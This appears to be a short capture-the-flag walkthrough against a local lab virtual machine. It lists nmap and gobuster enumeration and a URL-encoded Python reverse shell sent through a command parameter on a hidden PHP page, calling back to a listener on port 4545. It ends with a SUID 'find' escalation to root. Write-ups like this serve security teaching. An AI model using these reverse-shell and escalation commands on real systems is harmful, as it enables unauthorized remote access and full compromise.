Hello everyone !! 

Let's start CTF

IP:10.0.2.107

///////////////////////////////////////////////////////////////////////////////////////////
nmap -sC -sV -p- 10.0.2.107
Starting Nmap 7.91 ( https://nmap.org ) at 2021-11-18 12:51 EST
Nmap scan report for 10.0.2.107
Host is up (0.000071s latency).
Not shown: 65533 closed ports
PORT   STATE SERVICE VERSION
22/tcp open  ssh     OpenSSH 7.9p1 Debian 10 (protocol 2.0)
| ssh-hostkey: 
|   2048 ac:0d:1e:71:40:ef:6e:65:91:95:8d:1c:13:13:8e:3e (RSA)
|   256 24:9e:27:18:df:a4:78:3b:0d:11:8a:92:72:bd:05:8d (ECDSA)
|_  256 26:32:8d:73:89:05:29:43:8e:a1:13:ba:4f:83:53:f8 (ED25519)
80/tcp open  http    Apache httpd 2.4.38 ((Debian))
|_http-server-header: Apache/2.4.38 (Debian)
|_http-title: Site doesn't have a title (text/html).
MAC Address: 08:00:27:2E:E2:77 (Oracle VirtualBox virtual NIC)
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 8.95 seconds

///////////////////////////////////////////////////////////////////////////////////////////

gobuster dir -u http://10.0.2.107 -x html,txt,php,bak,js --wordlist /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt
===============================================================
Gobuster v3.1.0
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================
[+] Url:                     http://10.0.2.107
[+] Method:                  GET
[+] Threads:                 10
[+] Wordlist:                /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt
[+] Negative Status codes:   404
[+] User Agent:              gobuster/3.1.0
[+] Extensions:              html,txt,php,bak,js
[+] Timeout:                 10s
===============================================================
2021/11/18 12:51:21 Starting gobuster in directory enumeration mode
===============================================================
/index.html           (Status: 200) [Size: 575]
/robots.txt           (Status: 200) [Size: 53] 
/logs.php             (Status: 200) [Size: 34093]
/server-status        (Status: 403) [Size: 298] 

///////////////////////////////////////////////////////////////////////////////////////////

WkRJNWVXRXliSFZhTW14MVkwaEtkbG96U214ak0wMTFZMGRvZDBOblBUMEsK = workinginprogress.php

///////////////////////////////////////////////////////////////////////////////////////////

nc -lvnp 4545

http://10.0.2.107/workinginprogress.php?cmd=python3%20-c%20%27import%20socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect((%2210.0.2.10%22,4545));os.dup2(s.fileno(),0);%20os.dup2(s.fileno(),1);%20os.dup2(s.fileno(),2);p=subprocess.call([%22/bin/sh%22,%22-i%22]);%27

///////////////////////////////////////////////////////////////////////////////////////////


root@kali:~# nc -lvnp 4545
listening on [any] 4545 ...
connect to [10.0.2.10] from (UNKNOWN) [10.0.2.107] 39600
/bin/sh: 0: can't access tty; job control turned off
$ 

///////////////////////////////////////////////////////////////////////////////////////////

find . -exec /bin/sh -p \; -quit 

///////////////////////////////////////////////////////////////////////////////////////////

$ find . -exec /bin/sh -p \; -quit 

id
uid=33(www-data) gid=33(www-data) euid=0(root) egid=0(root) groups=0(root),33(www-data)
whoami
root
///////////////////////////////////////////////////////////////////////////////////////////
